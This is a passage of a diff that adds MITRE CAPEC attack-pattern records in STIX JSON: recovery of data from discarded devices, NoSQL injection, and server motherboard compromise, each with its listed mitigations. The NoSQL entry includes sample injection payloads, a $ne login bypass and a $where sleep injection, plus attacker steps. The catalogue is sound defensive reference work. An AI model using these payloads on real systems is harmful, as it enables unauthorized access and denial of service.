"external_references": [ + { + "external_id": "CAPEC-675", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/675.html" + }, + { + "external_id": "CWE-1266", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1266.html" + }, + { + "description": "Exfiltration Over Physical Medium", + "external_id": "T1052", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1052" + }, + { + "description": "Richard Kissel, Andrew Regenscheid, Matthew Scholl, Kevin Stine, NIST Special Publication 800-88 Revision 1: Guidelines for Media Sanitization, 2014--12, National Institute of Standards and Technology", + "external_id": "REF-663", + "source_name": "reference_from_CAPEC", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf" + }, + { + "description": "Linda Pesante, Christopher King, George Silowash, Disposing of Devices Safely, 2012, CISA United States Computer Emergency Readiness Team (US-CERT)", + "external_id": "REF-717", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/uscert/sites/default/files/publications/DisposeDevicesSafely.pdf" + } + ], + "id": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Retrieve Data from Decommissioned Devices", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--756a1a93-3734-426c-9e91-f9339de74a7a" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--55ce63d0-6143-4b95-b70c-87c5b60aafa8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_consequences": { + "Accountability": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n A company is contracted by an organization to provide data destruction services for solid state and hard disk drives being discarded. Prior to destruction, an adversary within the contracted company copies data from select devices, violating the data confidentiality requirements of the submitting organization.\n " + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "An adversary needs to have access to electronic data processing equipment being recycled or disposed of (e.g., laptops, servers) at a collection location and the ability to take control of it for the purpose of exploiting its content." + ], + "x_capec_skills_required": { + "High": "An adversary may need the ability to mount printed circuit boards and target individual chips for exploitation.", + "Medium": "An adversary needs the technical skills required to extract solid state drives, hard disk drives, and other storage media to host on a compatible system or harness to gain access to digital content." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Backup device data before erasure to retain intellectual property and inside knowledge.", + "id": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--03ca0e49-f51b-444a-bfae-ac04853513a4", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--768de10a-6dae-46e1-88e8-fac5a8033e51", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Overwrite data on device rather than deleting. Deleted data can still be recovered, even if the device trash can is emptied. Rewriting data removes any trace of the old data. Performing multiple overwrites followed by a zeroing of the device (overwriting with all zeros) is good practice.", + "id": "course-of-action--e4ccee19-a356-4c15-93b5-3f564f62c976", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--688300f5-73e3-4855-a5b0-11ef638a7f91", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e4ccee19-a356-4c15-93b5-3f564f62c976", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use a secure erase software.", + "id": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--006acdf6-fa11-4dbc-b447-35cfd3577991", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf22f1fa-b5cb-4733-a825-810c681f76aa", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Physically destroy the device if it is not intended to be reused. Using a specialized service to disintegrate, burn, melt or pulverize the device can be effective, but if those services are inaccessible, drilling nails or holes, or smashing the device with a hammer can be effective. Do not burn, microwave, or pour acid on a hard drive.", + "id": "course-of-action--6188a1a5-51e6-4194-aac9-6a2460c9cbdb", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--55cb9df9-3d72-443f-b1ce-78c51b0bba4e", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6188a1a5-51e6-4194-aac9-6a2460c9cbdb", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Physically destroy memory and SIM cards for mobile devices not intended to be reused.", + "id": "course-of-action--388e0698-f2f5-4a1e-9c92-8446aeb9bf7a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--74fd4f17-afa6-4329-9ea8-ddc1e2e6d43b", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--388e0698-f2f5-4a1e-9c92-8446aeb9bf7a", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that the user account has been terminated or switched to a new device before destroying.", + "id": "course-of-action--c28595a5-c39f-414b-9c5d-1907e7202d7d", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-675-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eb3df538-c4c4-4672-aef8-3908c2fce1fc", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c28595a5-c39f-414b-9c5d-1907e7202d7d", + "target_ref": "attack-pattern--a8b4faf6-2e52-434f-95a4-df5f9bdc985a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary targets software that constructs NoSQL statements based on user input or with parameters vulnerable to operator replacement in order to achieve a variety of technical impacts such as escalating privileges, bypassing authentication, and/or executing code.\n ", + "external_references": [ + { + "external_id": "CAPEC-676", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/676.html" + }, + { + "external_id": "CWE-943", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/943.html" + }, + { + "external_id": "CWE-1286", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1286.html" + }, + { + "description": "Testing for NoSQL Injection, The OWASP Foundation", + "external_id": "REF-668", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection" + }, + { + "description": "Charlie Belmer, NoSql Injection Cheatsheet, 2021--06---07, Null Sweep", + "external_id": "REF-669", + "source_name": "reference_from_CAPEC", + "url": "https://nullsweep.com/nosql-injection-cheatsheet/" + }, + { + "description": "Patrick Spiegel, NoSql Injection: Fun with Objects and Arrays, The OWASP Foundation", + "external_id": "REF-670", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf" + }, + { + "description": "NoSql Injection: Fun with Objects and ArraysNoSQL Injection Attacks and Prevention Techniques, 2019--06, WebOrion", + "external_id": "REF-671", + "source_name": "reference_from_CAPEC", + "url": "https://www.theweborion.com/wp-content/uploads/2019/06/NoSQL-Injection-Attacks-and-Prevention-Techniques.pdf" + } + ], + "id": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "NoSQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--70c8a212-72da-4a98-a626-e5d38e5416e3" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2fb2b2b8-b7de-45a2-aadb-5849d12fda8f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n The following examples primarily cite MongoDB, PHP, and NodeJS attacks due to their prominence and popularity. However, please note that these attacks are not exclusive to this NoSQL instance, programming language, or runtime framework.\n Within NodeJS, Login Bypass attacks are possible via MongoDB if user-input is not properly validated and sanitized [REF-670].\n //NodeJS with Express.jsdb.collection('users').find({\"user\": req.query.user,\"password\": req.query.password});\n \n \n The above code works fine if the user were to submit a query like the following:\n https://example.org/login?user=patrick&password=1234\n \n But an adversary could submit a malicious query such as the below, which would be interpreted by the code as follows:\n https://example.org/login?user=patrick&password[$ne]=\n //NodeJS with Express.jsdb.collection('users').find({\"user\": bob,\"password\": {\"&ne\": \"\"}});\n \n This will result in a Login Bypass attack, as the query will succeed for all values where Bob's password is not an empty string.\n ", + "\n MongoDB instances are also vulnerable to JavaScript Injection Attacks when user input is not properly validated and sanitized.\n //PHP with MongoDBdb.collection.find({$where: function() {return (this.username == $username) } } );\n \n \n \n If the user properly specifies a username, then this code will execute as intended. However, an adversary can inject JavaScript into the \"$username\" variable to achieve a NoSQL Injection attack as follows:\n //PHP with MongoDBdb.collection.find({$where: function() {return (this.username == 'foo'; sleep(5000) ) } } );\n \n \n This will result in the server sleeping for 5 seconds if the attack was successful. An adversary could supply a larger value to deny service to the application.\n ", + "\n If leveraging PHP with MongoDB, operator replacement attacks are possible if special query operators are not properly addressed. The below example from OWASP's \"Test for NoSQL Injection\" displays a simple case of how this could occur.[REF-668]\n db.myCollection.find({$where: function() {return obj.credits - obj.debits < 0; } } );\n \n \n Even though the above query does not depend on any user input, it is vulnerable to a NoSQL injection attack via operator replacement on the \"$where\" keyword. In this case, the adversary could exploit MongoDB in the following manner:\n $where: function() { //arbitrary JavaScript here }\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey target application: Due to the number of NoSQL databases available and the numerous language/API combinations of each, the adversary must first survey the target application to learn what technologies are being leveraged and how they interact with user-driven data.

    2. Techniques
    Determine the technology stack leveraged by the target application, such as the application server, drivers, frameworks, APIs, and databases being utilized.
    Identify areas of the application that interact with user input and may be involved with NoSQL queries.

Experiment

  1. Identify user-controllable input susceptible to injection: After identifying the technology stack being used and where user-driven input is leveraged, determine the user-controllable input susceptible to injection such as authentication or search forms. For each user-controllable input that the adversary suspects is vulnerable to NoSQL injection, attempt to inject characters or keywords that have special meaning in the given NoSQL database or language (e.g., \"$ne\" for MongoDB or \"$exists\" for PHP/MongoDB), or JavaScript that can be executed within the application. The goal is to create a NoSQL query with an invalid syntax.

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

  2. Experiment with NoSQL Injection vulnerabilities: After determining that a given input is vulnerable to NoSQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, modify/delete information in the database, or execute commands on the server.

    3. Techniques
    Use public resources such as OWASP's \"Testing for NoSQL Injection\" [REF-668] or Null Sweep's \"NoSQL Injection Cheatsheet\" [REF-669] and try different approaches for adding logic to NoSQL queries.
    Iteratively add logic to the NoSQL query and use detailed error messages from the server to debug the query.
    Attempt an HTTP Parameter Pollution attack to replace language-specific keywords, such as \"where\" within PHP [CAPEC-460].

Exploit

  1. Exploit NoSQL Injection vulnerability: After refining and adding various logic to NoSQL queries, craft and execute the underlying NoSQL query that will be used to attack the target system.

    2. Techniques
    Craft and Execute underlying NoSQL query
", + "x_capec_extended_description": "\n NoSQL database calls are written in an application's programming language, via a custom API call, or formatted in a common convention (e.g., JSON, XML, etc.), any of which the adversary can exploit to achieve the aforementioned goals. NoSQL attacks usually result from improper sanitization and validation of data that originates from a user, either via special character or JavaScript injection. In both cases, the adversary crafts input strings so that when the target software constructs NoSQL statements based on the input, the resulting NoSQL statement performs actions other than those intended by the application. However, unlike traditional SQL Injection attacks, NoSQL injection attacks can also occur in instances where the application does not rely upon user input, as is the case in operator replacements. This entails the adversary overriding reserved NoSQL variable names with ones that have been modified with malicious functionality (e.g., $where in MongoDB). In all cases, depending on the NoSQL API and data model used, successful injection can cause information disclosure, data modification, and code execution at the application level.\n Note: NoSQL Injection attacks are executed within a procedural language (e.g., C, C++, Perl), as opposed to the declarative SQL language itself. As a result, NoSQL injection attacks can potentially result in greater impacts than traditional SQL Injection attacks [REF-668].\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "Awareness of the technology stack being leveraged by the target application.", + "NoSQL queries used by the application to store, retrieve, or modify data.", + "User-controllable input that is not properly validated by the application as part of NoSQL queries.", + "Target potentially susceptible to operator replacement attacks." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Low": "For keyword and JavaScript injection attacks, it is fairly simple for someone with basic NoSQL knowledge to perform NoSQL injection, once the target's technology stack has been determined.", + "Medium": "For operator replacement attacks, the adversary must also have knowledge of HTTP Parameter Pollution attacks and how to conduct them." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as relevant NoSQL and JavaScript content. NoSQL-specific keywords, such as $ne, $eq or $gt for MongoDB, must be filtered in addition to characters such as a single-quote(') or semicolons (;) based on the context in which they appear. Validation should also extend to expected types.", + "id": "course-of-action--c3e9e3ff-9ab8-46b9-8bd2-7d63b43a2ef4", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--869ea0bd-ba58-497e-ba60-bb6b4e05a203", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c3e9e3ff-9ab8-46b9-8bd2-7d63b43a2ef4", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If possible, leverage safe APIs (e.g., PyMongo and Flask-PyMongo for Python and MongoDB) for queries as opposed to building queries from strings.", + "id": "course-of-action--c36658ef-ec56-451f-9d0f-cc4e8364709e", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d13883d0-b82e-40df-b760-850af2e151e9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c36658ef-ec56-451f-9d0f-cc4e8364709e", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure the most recent version of a NoSQL database and it's corresponding API are used by the application.", + "id": "course-of-action--f535cf43-16c4-4702-82b4-f2ad54457382", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ba86a192-07aa-4b27-be1a-28cd2e920662", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f535cf43-16c4-4702-82b4-f2ad54457382", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use of custom error pages - Adversaries can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application.", + "id": "course-of-action--4c849df7-9814-41f1-b257-5be9d1636087", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1126520b-05be-455e-9d4d-a4bcf7ce2218", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4c849df7-9814-41f1-b257-5be9d1636087", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Exercise the principle of Least Privilege with regards to application accounts to minimize damage if a NoSQL injection attack is successful.", + "id": "course-of-action--7f433708-ce26-4500-81a0-5a94a7fe8032", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ec6f7349-8700-4bcc-a21a-24391221b7c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7f433708-ce26-4500-81a0-5a94a7fe8032", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using MongoDB, disable server-side JavaScript execution and leverage a sanitization module such as \"mongo-sanitize\".", + "id": "course-of-action--3aa6e395-8929-42e8-96db-20d559ee7c77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5101e2fb-b215-4be6-857a-0e5c8aa7341c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3aa6e395-8929-42e8-96db-20d559ee7c77", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If using PHP with MongoDB, ensure all special query operators (starting with $) use single quotes to prevent operator replacement attacks.", + "id": "course-of-action--3753e389-6551-4beb-a945-aa3c36831232", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce0040af-39bd-44c9-b2a6-d529ca6a642d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3753e389-6551-4beb-a945-aa3c36831232", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Additional mitigations will depend on the NoSQL database, API, and programming language leveraged by the application.", + "id": "course-of-action--514cd9bd-12f1-4cf8-9093-4f575517aa3b", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-676-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3626f089-3a82-4044-85fc-50f2f7def667", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--514cd9bd-12f1-4cf8-9093-4f575517aa3b", + "target_ref": "attack-pattern--9d435b55-e3ef-4a19-be67-c3350f20e44e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n Malware is inserted in a server motherboard (e.g., in the flash memory) in order to alter server functionality from that intended. The development environment or hardware/software support activity environment is susceptible to an adversary inserting malicious software into hardware components during development or update.\n ", + "external_references": [ + { + "external_id": "CAPEC-677", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/677.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Melinda Reed, John F. Miller, Paul Popick, Supply Chain Attack Patterns: Framework and Catalog, 2014--08, Office of the Assistant Secretary of Defense for Research and Engineering", + "external_id": "REF-660", + "source_name": "reference_from_CAPEC", + "url": "https://docplayer.net/13041016-Supply-chain-attack-patterns-framework-and-catalog.html" + }, + { + "description": " Kaspersky Finds Sophisticated UEFI Malware in the Wild , 2020--10---05, ExtremeTech ", + "external_id": "REF-685", + "source_name": "reference_from_CAPEC", + "url": " https://www.extremetech.com/computing/315860-kaspersky-finds-sophisticated-uefi-malware-in-the-wild" + } + ], + "id": "attack-pattern--ea2e5cbd-8278-4f8a-b56b-3cfb955d2366", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Server Motherboard Compromise", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--a79f5cc6-781c-4e49-a00e-7aae93718f9e" + ], + "x_capec_consequences": { + "Integrity": [ + "Execute Unauthorized Commands" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Physical Security", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Malware is inserted into the Unified Extensible Firmware Interface (UEFI) software that resides on a flash memory chip soldered to a computer’s motherboard. It is the first thing to turn on when a system is booted and is allowed access to almost every part of the operating system. Hence, the malware will have extensive control over operating system functions and persist after system reboots. [REF-685]\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary with access to hardware/software processes and tools within the development or hardware/software support environment can insert malicious software into hardware components during development or update/maintenance." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2021-10-21T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Purchase IT systems, components and parts from government approved vendors whenever possible.", + "id": "course-of-action--c1be3529-9fb7-40a8-a6eb-097c4e1a3933", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-677-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": 